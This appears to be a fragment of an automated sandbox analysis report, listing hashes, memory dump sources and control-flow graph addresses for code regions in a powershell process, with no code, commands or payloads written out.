                                                                                      • Opcode ID: 840831e69fb1cc36f6625411661049254c1dadf1827f20262c933c42c7c98d3d
                                                                                      • Instruction ID: c39f2d17d41a15ef64d4229a5ccf9ea0140602643e2ffa57a17f431e918e79f0
                                                                                      • Opcode Fuzzy Hash: 840831e69fb1cc36f6625411661049254c1dadf1827f20262c933c42c7c98d3d
                                                                                      • Instruction Fuzzy Hash: 40226E34B00224DFDB14DFA9C4946ADB7F2EF88306B15846DD50A9B369DB39DC42CB64
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1390758738.0000000008720000.00000040.00000800.00020000.00000000.sdmp, Offset: 08720000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_8720000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 10f162d5bf0ee734f03eb04d00848b04abd63b29110a4148202a67e459c221eb
                                                                                      • Instruction ID: 5565ba6d20387938a9ceadff59a155923f26d9450bcb5f887e3cb7f860989335
                                                                                      • Opcode Fuzzy Hash: 10f162d5bf0ee734f03eb04d00848b04abd63b29110a4148202a67e459c221eb
                                                                                      • Instruction Fuzzy Hash: C1F1AE35B00214DFDB15DBA5D854ABEB7F6AF88311B15806ED406AB398DF34EC028BA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1390758738.0000000008720000.00000040.00000800.00020000.00000000.sdmp, Offset: 08720000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_8720000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 502728485676b89ced6c31aedcbb70b3c39c83dbee5adf85420f138d4224ba86
                                                                                      • Instruction ID: f0afa4dbd8272ae1b2221701b6a0f36136f9ca2239cfb8cd6ec04386ebe89d12
                                                                                      • Opcode Fuzzy Hash: 502728485676b89ced6c31aedcbb70b3c39c83dbee5adf85420f138d4224ba86
                                                                                      • Instruction Fuzzy Hash: 0B123C30B00214DFDB14DFA9C594AAEB7F2BF88311F5985A9D406AB359DB35EC42CB60
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1390758738.0000000008720000.00000040.00000800.00020000.00000000.sdmp, Offset: 08720000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_8720000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 11bff1b13c32a12b50fbfaace6e6bff99e3ba1fb52303a7df5607283033fe587
                                                                                      • Instruction ID: 707d817013886bf3b2887906be19e61eccd91a39f64aff495cc777398e5f9235
                                                                                      • Opcode Fuzzy Hash: 11bff1b13c32a12b50fbfaace6e6bff99e3ba1fb52303a7df5607283033fe587
                                                                                      • Instruction Fuzzy Hash: ABE18C30B00214DFDB54EB69C498AAEB7F2AF88311F15C56DD406AB3A9DB35EC41CB64
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1381618260.0000000007DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DE0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7de0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 99d23d8a99821f9856faefc84dc9fba6b1a50d9e14f43b8add404b2c6b7e1f90
                                                                                      • Instruction ID: 2bb1698b51cc6690ea720e26d1fd209e89d7758260353037121a202af77260d4
                                                                                      • Opcode Fuzzy Hash: 99d23d8a99821f9856faefc84dc9fba6b1a50d9e14f43b8add404b2c6b7e1f90
                                                                                      • Instruction Fuzzy Hash: 0FA1C070B00315DFCB15AB79995867EBAEBAFC9204B28806AD547DB380DF35DC02CB65
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1390758738.0000000008720000.00000040.00000800.00020000.00000000.sdmp, Offset: 08720000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_8720000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 17818ea3ac15005587aa70fda9cda54a6453c55e24ca2e6c90d2c7a9f10d0888
                                                                                      • Instruction ID: c85f3d79380673e50d62858ce6ebcba66f811052a2a768b728df99b161f35564
                                                                                      • Opcode Fuzzy Hash: 17818ea3ac15005587aa70fda9cda54a6453c55e24ca2e6c90d2c7a9f10d0888
                                                                                      • Instruction Fuzzy Hash: 97818D35B00618DBDB14DFB5C8546AEB7B2EFC4301F14852ED906AB388EF359C468B64
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 0 7f67a30-7f67a54 1 7f67cf6-7f67cfc 0->1 2 7f67a5a-7f67a5f 0->2 10 7f67cfd-7f67d05 1->10 3 7f67a77-7f67a7b 2->3 4 7f67a61-7f67a67 2->4 8 7f67a81-7f67a85 3->8 9 7f67c9e-7f67ca8 3->9 5 7f67a6b-7f67a75 4->5 6 7f67a69 4->6 5->3 6->3 13 7f67a87-7f67a96 8->13 14 7f67a98 8->14 11 7f67cb6-7f67cbc 9->11 12 7f67caa-7f67cb3 9->12 10->10 17 7f67d07-7f67d3c 10->17 18 7f67cc2-7f67cce 11->18 19 7f67cbe-7f67cc0 11->19 15 7f67a9a-7f67a9c 13->15 14->15 15->9 20 7f67aa2-7f67aa6 15->20 22 7f67d42-7f67d47 17->22 23 7f6811f-7f68154 17->23 21 7f67cd0-7f67cf3 18->21 19->21 26 7f67aa8-7f67ab7 20->26 27 7f67ab9 20->27 24 7f67d5f-7f67d66 22->24 25 7f67d49-7f67d4f 22->25 48 7f68156-7f68162 23->48 49 7f68164 23->49 24->23 32 7f67d6c-7f67d71 24->32 29 7f67d53-7f67d5d 25->29 30 7f67d51 25->30 31 7f67abb-7f67abd 26->31 27->31 29->24 30->24 31->9 35 7f67ac3-7f67ad0 31->35 36 7f67d73-7f67d79 32->36 37 7f67d89-7f67d93 32->37 42 7f67ad6-7f67ae7 35->42 43 7f67b88-7f67bd7 35->43 39 7f67d7d-7f67d87 36->39 40 7f67d7b 36->40 37->23 44 7f67d99-7f67d9e 37->44 39->37 40->37 60 7f67b01-7f67b20 42->60 61 7f67ae9-7f67aef 42->61 107 7f67bde-7f67be4 43->107 46 7f67db6-7f67dba 44->46 47 7f67da0-7f67da6 44->47 56 7f67dc0-7f67dc4 46->56 57 7f680c1-7f680cb 46->57 54 7f67daa-7f67db4 47->54 55 7f67da8 47->55 51 7f68166-7f68168 48->51 49->51 58 7f6818e-7f68198 51->58 59 7f6816a-7f6816c 51->59 54->46 55->46 62 7f67dc6-7f67dd5 56->62 63 7f67dd7 56->63 64 7f680cd-7f680d6 57->64 65 7f680d9-7f680df 57->65 72 7f681a2-7f681a8 58->72 73 7f6819a-7f6819f 58->73 69 7f68186-7f6818b 59->69 70 7f6816e-7f68174 59->70 60->43 84 7f67b22-7f67b42 60->84 74 7f67af3-7f67aff 61->74 75 7f67af1 61->75 71 7f67dd9-7f67ddb 62->71 63->71 66 7f680e5-7f680f1 65->66 67 7f680e1-7f680e3 65->67 77 7f680f3-7f6811c 66->77 67->77 79 7f68176 70->79 80 7f68178-7f68184 70->80 71->57 83 7f67de1-7f67e38 71->83 81 7f681ae-7f681ba 72->81 82 7f681aa-7f681ac 72->82 74->60 75->60 79->69 80->69 87 7f681bc-7f681d6 81->87 82->87 114 7f67e46-7f67ef6 83->114 115 7f67e3a-7f67e3c 83->115 97 7f67b44-7f67b4a 84->97 98 7f67b5c-7f67b75 84->98 101 7f67b4e-7f67b5a 97->101 102 7f67b4c 97->102 108 7f67b77-7f67b79 98->108 109 7f67b83-7f67b86 98->109 101->98 102->98 111 7f67be6-7f67bef 107->111 112 7f67c07 107->112 108->109 109->107 116 7f67bf6-7f67c03 111->116 117 7f67bf1-7f67bf4 111->117 113 7f67c0a-7f67c13 112->113 118 7f67c15-7f67c18 113->118 119 7f67c22-7f67c3a 113->119 130 7f67f04-7f67fb4 114->130 131 7f67ef8-7f67efa 114->131 115->114 121 7f67c05 116->121 117->121 118->119 126 7f67c3f-7f67c9b 119->126 121->113 137 7f67fb6-7f67fb8 130->137 138 7f67fc2-7f6802a 130->138 131->130 137->138 141 7f6802c-7f68035 138->141 142 7f6804d 138->142 143 7f68037-7f6803a 141->143 144 7f6803c-7f68049 141->144 145 7f68050-7f680be 142->145 146 7f6804b 143->146 144->146 146->145
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1383309193.0000000007F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F60000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7f60000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: tP)r$tP)r$tP)r$tP)r$$)r$$)r$$)r
                                                                                      • API String ID: 0-3302814694
                                                                                      • Opcode ID: d65a197763b3f4c0db2807a966279a6d230f5cde3559a7c1dd76d562546b4a79
                                                                                      • Instruction ID: e352d6dfd26fcb84864902643cf1c68a11b2149ff0a0edd3ffffd5e548f804a2
                                                                                      • Opcode Fuzzy Hash: d65a197763b3f4c0db2807a966279a6d230f5cde3559a7c1dd76d562546b4a79
                                                                                      • Instruction Fuzzy Hash: F202DAB5B00215EFDB14DF58C80466AB7E2EFC5324F28846AE9569B395DB31DC41CBA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1383309193.0000000007F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F60000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7f60000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4')r$4')r$4')r$4')r$xbb
                                                                                      • API String ID: 0-2388554352
                                                                                      • Opcode ID: ec1cc1d3072cee05dfc35f4282b874356a37a83a7354e48fd007ef46b59c18b7
                                                                                      • Instruction ID: a5e922ad5b59ef1b6c09993adae975452a81a38828de3eadfcda3eda436fe35c
                                                                                      • Opcode Fuzzy Hash: ec1cc1d3072cee05dfc35f4282b874356a37a83a7354e48fd007ef46b59c18b7
                                                                                      • Instruction Fuzzy Hash: 2A52B1B0B04306DFDB14DF68C548AAABBF2EF85314F28856AD9159B385DB31DC41CBA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1383309193.0000000007F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F60000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7f60000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4')r$4')r$$)r$$)r$$)r
                                                                                      • API String ID: 0-2908012362
                                                                                      • Opcode ID: 6e396060ae40372edc228378b3d9b5302abb8b1a6180df133c29aa4600a50458
                                                                                      • Instruction ID: 9139a68643d215d664f8d61923020eb943dcb7f64c2a2948275e506e66aebbcd
                                                                                      • Opcode Fuzzy Hash: 6e396060ae40372edc228378b3d9b5302abb8b1a6180df133c29aa4600a50458
                                                                                      • Instruction Fuzzy Hash: 464239B1B04246DFDB25CF68C8486AA7BF2BF86250F1C80AED555CB296DB31DC41C792
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1383309193.0000000007F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F60000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7f60000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4')r$4')r$4')r$4')r
                                                                                      • API String ID: 0-2790620204
                                                                                      • Opcode ID: 0a537552119b96058ec71406cc0f2e6ec108d3ade3e00dabd8f6b38dccc0d7e3
                                                                                      • Instruction ID: 99584089e72b768b19673badab5672db18f64b9693db8a1b9bd8f45068969f41
                                                                                      • Opcode Fuzzy Hash: 0a537552119b96058ec71406cc0f2e6ec108d3ade3e00dabd8f6b38dccc0d7e3
                                                                                      • Instruction Fuzzy Hash: 1B923AB0A01214DFDB64CB58C945FAAB7B2EF88304F24C599E909AB795CB71DC81CF91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1025 803daa0-803dadc 1030 803db35-803db41 1025->1030 1031 803dade-803daf3 1025->1031 1034 803db43-803db7a 1030->1034 1035 803db7f-803db8b 1030->1035 1031->1030 1038 803daf5-803db30 1031->1038 1051 803e26e-803e275 1034->1051 1040 803db91-803dba8 1035->1040 1041 803dc68-803dc74 1035->1041 1038->1051 1052 803dbd4-803dbe7 1040->1052 1053 803dbaa-803dbcf 1040->1053 1046 803dc76-803dcaa 1041->1046 1047 803dcaf-803dcbb 1041->1047 1046->1051 1057 803dcc1-803dcd8 1047->1057 1058 803de10-803de1c 1047->1058 1072 803dbf3-803dc06 1052->1072 1073 803dbe9-803dbf1 1052->1073 1071 803dc54-803dc63 1053->1071 1075 803dd6b-803dd75 1057->1075 1076 803dcde-803dcf4 1057->1076 1065 803de22-803de2e 1058->1065 1066 803deff-803df0b 1058->1066 1083 803de30-803de3c 1065->1083 1084 803de3e-803de75 1065->1084 1081 803df69-803df75 1066->1081 1082 803df0d-803df24 1066->1082 1071->1051 1096 803dc08-803dc2d 1072->1096 1097 803dc2f-803dc52 1072->1097 1073->1071 1092 803ddb3-803ddc8 1075->1092 1093 803dd77-803ddae 1075->1093 1102 803dd32-803dd66 1076->1102 1103 803dcf6-803dd2d 1076->1103 1094 803dfb3-803dfbf 1081->1094 1095 803df77-803dfae 1081->1095 1109 803df62-803df64 1082->1109 1110 803df26-803df5d 1082->1110 1083->1084 1099 803de7a-803de84 1083->1099 1084->1051 1092->1058 1122 803ddca-803de0b 1092->1122 1093->1051 1118 803dfc1-803dff8 1094->1118 1119 803dffd-803e009 1094->1119 1095->1051 1096->1071 1097->1071 1113 803dec2-803defa 1099->1113 1114 803de86-803debd 1099->1114 1102->1051 1103->1051 1109->1051 1110->1051 1113->1051 1114->1051 1118->1051 1136 803e00b-803e017 1119->1136 1137 803e069-803e075 1119->1137 1122->1051 1153 803e019-803e023 1136->1153 1154 803e02c 1136->1154 1151 803e077-803e083 1137->1151 1152 803e0d5-803e0ed 1137->1152 1161 803e085-803e08f 1151->1161 1162 803e098 1151->1162 1169 803e153-803e15f 1152->1169 1170 803e0ef-803e0fb 1152->1170 1153->1154 1164 803e025-803e02a 1153->1164 1155 803e031-803e064 1154->1155 1155->1051 1161->1162 1171 803e091-803e096 1161->1171 1165 803e09d-803e0d0 1162->1165 1164->1155 1165->1051 1176 803e1f1-803e212 1169->1176 1177 803e165-803e1ec 1169->1177 1178 803e117-803e14e 1170->1178 1179 803e0fd-803e115 1170->1179 1171->1165 1190 803e214-803e21c 1176->1190 1191 803e278-803e2b3 1176->1191 1177->1051 1178->1051 1179->1169 1179->1178 1193 803e21e-803e231 1190->1193 1194 803e26c 1190->1194 1197 803e464-803e47b 1191->1197 1198 803e2b9-803e2bd 1191->1198 1193->1194 1206 803e233-803e26a 1193->1206 1194->1051 1202 803e482-803e4f0 1197->1202 1201 803e2c3-803e309 1198->1201 1198->1202 1210 803e434-803e447 1201->1210 1211 803e30f-803e31e 1201->1211 1206->1051 1213 803e44e 1210->1213 1220 803e321-803e33f call 803e99e 1211->1220 1213->1197 1225 803e345-803e3ae 1220->1225 1226 803e41f-803e42e 1220->1226 1234 803e3b0-803e3b5 1225->1234 1235 803e3bd-803e3c4 1225->1235 1226->1210 1226->1220 1234->1235 1236 803e3ca-803e408 1235->1236 1237 803e449 1235->1237 1242 803e411-803e41c 1236->1242 1237->1213 1242->1226
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1385256932.0000000008030000.00000040.00000800.00020000.00000000.sdmp, Offset: 08030000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_8030000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 0o0q$p<)r$tZ`u$$)r
                                                                                      • API String ID: 0-1208346816
                                                                                      • Opcode ID: 54a10c7ee3f3d984573d852359aff252fe51700a3b571b7fc4acb773829b1974
                                                                                      • Instruction ID: f59109d1dcdf3612adb4df4cfbd596e2cbe3946be4cedb92146a2cb1a3d3d3ca
                                                                                      • Opcode Fuzzy Hash: 54a10c7ee3f3d984573d852359aff252fe51700a3b571b7fc4acb773829b1974
                                                                                      • Instruction Fuzzy Hash: 5E42BC70704210AFEB48AF68C85067E77E7EF85604B2489AEE406CF396DF75DC068B95
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1245 7f609d8-7f609f8 1246 7f610a3-7f610f0 1245->1246 1247 7f609fe-7f60a03 1245->1247 1268 7f610f2-7f610f8 1246->1268 1269 7f6110a-7f6111a 1246->1269 1248 7f60a05-7f60a0b 1247->1248 1249 7f60a1b-7f60a22 1247->1249 1250 7f60a0f-7f60a19 1248->1250 1251 7f60a0d 1248->1251 1249->1246 1252 7f60a28-7f60a2d 1249->1252 1250->1249 1251->1249 1254 7f60a45-7f60a4c 1252->1254 1255 7f60a2f-7f60a35 1252->1255 1254->1246 1257 7f60a52-7f60a57 1254->1257 1259 7f60a37 1255->1259 1260 7f60a39-7f60a43 1255->1260 1261 7f60a6f 1257->1261 1262 7f60a59-7f60a5f 1257->1262 1259->1254 1260->1254 1267 7f60a72-7f60a7c 1261->1267 1265 7f60a63-7f60a6d 1262->1265 1266 7f60a61 1262->1266 1265->1261 1266->1261 1267->1246 1270 7f60a82-7f60a87 1267->1270 1271 7f610fc-7f61108 1268->1271 1272 7f610fa 1268->1272 1283 7f6111e-7f6112a 1269->1283 1284 7f6111c 1269->1284 1274 7f60a9f-7f60abe 1270->1274 1275 7f60a89-7f60a8f 1270->1275 1271->1269 1272->1269 1276 7f60ac0-7f60aea 1274->1276 1277 7f60aed-7f60af7 1274->1277 1279 7f60a93-7f60a9d 1275->1279 1280 7f60a91 1275->1280 1276->1277 1277->1246 1281 7f60afd-7f60b02 1277->1281 1279->1274 1280->1274 1287 7f60b04-7f60b0a 1281->1287 1288 7f60b1a-7f60b4b 1281->1288 1289 7f6112c-7f61130 1283->1289 1284->1289 1290 7f60b0e-7f60b18 1287->1290 1291 7f60b0c 1287->1291 1288->1246 1296 7f60b51-7f60b59 1288->1296 1290->1288 1291->1288 1297 7f60b71-7f60b80 1296->1297 1298 7f60b5b-7f60b61 1296->1298 1297->1246 1299 7f60b86-7f60b8d 1297->1299 1300 7f60b65-7f60b6f 1298->1300 1301 7f60b63 1298->1301 1302 7f60ba5-7f60c02 1299->1302 1303 7f60b8f-7f60b95 1299->1303 1300->1297 1301->1297 1313 7f61088-7f61094 1302->1313 1314 7f60c08-7f60c3a 1302->1314 1304 7f60b97 1303->1304 1305 7f60b99-7f60ba3 1303->1305 1304->1302 1305->1302 1317 7f60c63-7f60c6d 1314->1317 1318 7f60c3c-7f60c5b 1314->1318 1319 7f60c73-7f60c78 1317->1319 1320 7f60e4d-7f60e7f 1317->1320 1318->1317 1322 7f60c90-7f60ca2 1319->1322 1323 7f60c7a-7f60c80 1319->1323 1351 7f60f70-7f60f84 1320->1351 1322->1320 1327 7f60ca8-7f60cb0 1322->1327 1325 7f60c84-7f60c8e 1323->1325 1326 7f60c82 1323->1326 1325->1322 1326->1322 1328 7f60cb2-7f60cb8 1327->1328 1329 7f60cc8-7f60cda 1327->1329 1333 7f60cbc-7f60cc6 1328->1333 1334 7f60cba 1328->1334 1329->1320 1330 7f60ce0-7f60ce5 1329->1330 1335 7f60ce7-7f60ced 1330->1335 1336 7f60cfd-7f60d09 1330->1336 1333->1329 1334->1329 1337 7f60cf1-7f60cfb 1335->1337 1338 7f60cef 1335->1338 1336->1320 1339 7f60d0f-7f60d2a 1336->1339 1337->1336 1338->1336 1345 7f60d44-7f60d48 1339->1345 1346 7f60d2c-7f60d32 1339->1346 1350 7f60d4f-7f60d5b 1345->1350 1347 7f60d36-7f60d42 1346->1347 1348 7f60d34 1346->1348 1347->1345 1348->1345 1350->1320 1355 7f60d61-7f60d69 1350->1355 1352 7f60f86-7f60fa5 1351->1352 1353 7f60fad-7f60fb7 1351->1353 1352->1353 1353->1246 1356 7f60fbd-7f60fc2 1353->1356 1357 7f60d81-7f60de4 1355->1357 1358 7f60d6b-7f60d71 1355->1358 1360 7f60fc4-7f60fca 1356->1360 1361 7f60fda-7f60fe9 1356->1361 1379 7f60de9-7f60df3 1357->1379 1362 7f60d75-7f60d7f 1358->1362 1363 7f60d73 1358->1363 1366 7f60fce-7f60fd8 1360->1366 1367 7f60fcc 1360->1367 1361->1246 1364 7f60fef-7f60ff7 1361->1364 1362->1357 1363->1357 1369 7f6100f-7f61083 1364->1369 1370 7f60ff9-7f60fff 1364->1370 1366->1361 1367->1361 1369->1267 1371 7f61003-7f6100d 1370->1371 1372 7f61001 1370->1372 1371->1369 1372->1369 1381 7f60df8-7f60e48 1379->1381 1381->1351
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1383309193.0000000007F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F60000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7f60000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4')r$4')r$$)r$$)r
                                                                                      • API String ID: 0-1149029503
                                                                                      • Opcode ID: e308f12cd58b1fb3a20e6303997f1ba13c3ecb14dd06201540b7de2c43c03103
                                                                                      • Instruction ID: f9b8a66cb17c50f6dee29ed435c87516a55922e9968cc2d5ba7aaf0db3b5e8e0
                                                                                      • Opcode Fuzzy Hash: e308f12cd58b1fb3a20e6303997f1ba13c3ecb14dd06201540b7de2c43c03103
                                                                                      • Instruction Fuzzy Hash: 94127CB4F10209DFDB54CB58C844EAAB7F2EF89315F28C05AE916AB355CA71EC41CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1563 803ec28-803ec65 1568 803ec67-803ec73 1563->1568 1569 803ecd9-803ece5 1563->1569 1572 803ec75-803ec9a 1568->1572 1573 803ec9f 1568->1573 1574 803eceb-803edc6 1569->1574 1575 803eefc 1569->1575 1576 803eefe-803ef03 1572->1576 1579 803eca7-803eca9 1573->1579 1591 803ee02-803eec3 1574->1591 1592 803edc8-803edfd 1574->1592 1575->1576 1579->1575 1580 803ecaf-803ecd4 1579->1580 1580->1576 1591->1575 1603 803eec5-803eefa 1591->1603 1592->1576 1603->1576
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1385256932.0000000008030000.00000040.00000800.00020000.00000000.sdmp, Offset: 08030000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_8030000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $)r$$)r$$)r$$)r
                                                                                      • API String ID: 0-3891146080
                                                                                      • Opcode ID: 847e804a662d590a8d907a37e85e804a88775423541d4cdf36dc525fa6b2af47
                                                                                      • Instruction ID: 3ba1d7874588c71e402ede64a22f65ccfac96fde5f5a36beefb0d6670ab986a8
                                                                                      • Opcode Fuzzy Hash: 847e804a662d590a8d907a37e85e804a88775423541d4cdf36dc525fa6b2af47
                                                                                      • Instruction Fuzzy Hash: 39516370B002249BEB58DB69C8107AE77E7AF85701B2585ADD006EB7C5EF35DC064BD8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 2511 7f61560-7f61585 2512 7f616fa-7f6174c 2511->2512 2513 7f6158b-7f61590 2511->2513 2530 7f6174e-7f61769 2512->2530 2531 7f6176b 2512->2531 2514 7f61592-7f61598 2513->2514 2515 7f615a8-7f615b4 2513->2515 2517 7f6159c-7f615a6 2514->2517 2518 7f6159a 2514->2518 2522 7f616a4-7f616ae 2515->2522 2523 7f615ba-7f615bd 2515->2523 2517->2515 2518->2515 2524 7f616b0-7f616b9 2522->2524 2525 7f616bc-7f616c2 2522->2525 2523->2522 2527 7f615c3-7f615ca 2523->2527 2528 7f616c4-7f616c6 2525->2528 2529 7f616c8-7f616d4 2525->2529 2527->2512 2532 7f615d0-7f615d5 2527->2532 2535 7f616d6-7f616f7 2528->2535 2529->2535 2536 7f6176d-7f6176f 2530->2536 2531->2536 2533 7f615d7-7f615dd 2532->2533 2534 7f615ed-7f615f1 2532->2534 2537 7f615e1-7f615eb 2533->2537 2538 7f615df 2533->2538 2534->2522 2539 7f615f7-7f615f9 2534->2539 2542 7f61775-7f61777 2536->2542 2543 7f61850-7f6185a 2536->2543 2537->2534 2538->2534 2546 7f615fb-7f61607 2539->2546 2547 7f61609 2539->2547 2544 7f61787 2542->2544 2545 7f61779-7f61785 2542->2545 2548 7f61866-7f6186c 2543->2548 2549 7f6185c-7f61863 2543->2549 2551 7f61789-7f6178b 2544->2551 2545->2551 2553 7f6160b-7f6160d 2546->2553 2547->2553 2555 7f61872-7f6187e 2548->2555 2556 7f6186e-7f61870 2548->2556 2551->2543 2558 7f61791-7f61795 2551->2558 2553->2522 2559 7f61613-7f61621 2553->2559 2560 7f61880-7f6189f 2555->2560 2556->2560 2562 7f61797-7f617a6 2558->2562 2563 7f617a8 2558->2563 2568 7f61623-7f61629 2559->2568 2569 7f6163b-7f616a1 2559->2569 2564 7f617aa-7f617ac 2562->2564 2563->2564 2564->2543 2567 7f617b2-7f617e7 2564->2567 2579 7f617f6-7f61811 2567->2579 2580 7f617e9-7f617ec 2567->2580 2571 7f6162d-7f61639 2568->2571 2572 7f6162b 2568->2572 2571->2569 2572->2569 2582 7f61813-7f61815 2579->2582 2583 7f6181f-7f61824 2579->2583 2580->2579 2582->2583 2584 7f61826 2583->2584 2585 7f61828-7f6182b 2583->2585 2584->2585 2586 7f618a2-7f61904 2585->2586 2587 7f6182d-7f6184d 2585->2587 2592 7f61906-7f61921 2586->2592 2593 7f61923 2586->2593 2594 7f61925-7f61927 2592->2594 2593->2594 2596 7f61a1e-7f61a28 2594->2596 2597 7f6192d-7f6192f 2594->2597 2600 7f61a36-7f61a3c 2596->2600 2601 7f61a2a-7f61a33 2596->2601 2598 7f61931-7f6193d 2597->2598 2599 7f6193f 2597->2599 2603 7f61941-7f61943 2598->2603 2599->2603 2604 7f61a42-7f61a4e 2600->2604 2605 7f61a3e-7f61a40 2600->2605 2603->2596 2606 7f61949-7f61987 2603->2606 2607 7f61a50-7f61a6e 2604->2607 2605->2607 2615 7f61995-7f6199a 2606->2615 2616 7f61989-7f6198b 2606->2616 2617 7f6199f 2615->2617 2618 7f6199c 2615->2618 2616->2615 2619 7f619a9-7f619ae 2617->2619 2618->2617 2620 7f619b0-7f619ba 2619->2620 2621 7f619bc-7f61a04 2619->2621 2622 7f61a12-7f61a1b 2620->2622 2628 7f61a06 2621->2628 2629 7f61a0b 2621->2629 2628->2629 2629->2622
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1383309193.0000000007F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F60000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7f60000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $)r$$)r$$)r
                                                                                      • API String ID: 0-3780406136
                                                                                      • Opcode ID: ef012fffb91447b6f6545e2401197bb72a533a4f23f33542c6c76a68025cc445
                                                                                      • Instruction ID: 63e26706d7a997ef2522c4a6565abe9cc8f13b58b1cca0006c2c9bcd40929ecb
                                                                                      • Opcode Fuzzy Hash: ef012fffb91447b6f6545e2401197bb72a533a4f23f33542c6c76a68025cc445
                                                                                      • Instruction Fuzzy Hash: 60D14BB5F0434A9FDB259B79D84467ABBE1EFC5210B2C847AD845DB382EA31CC00C7A1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
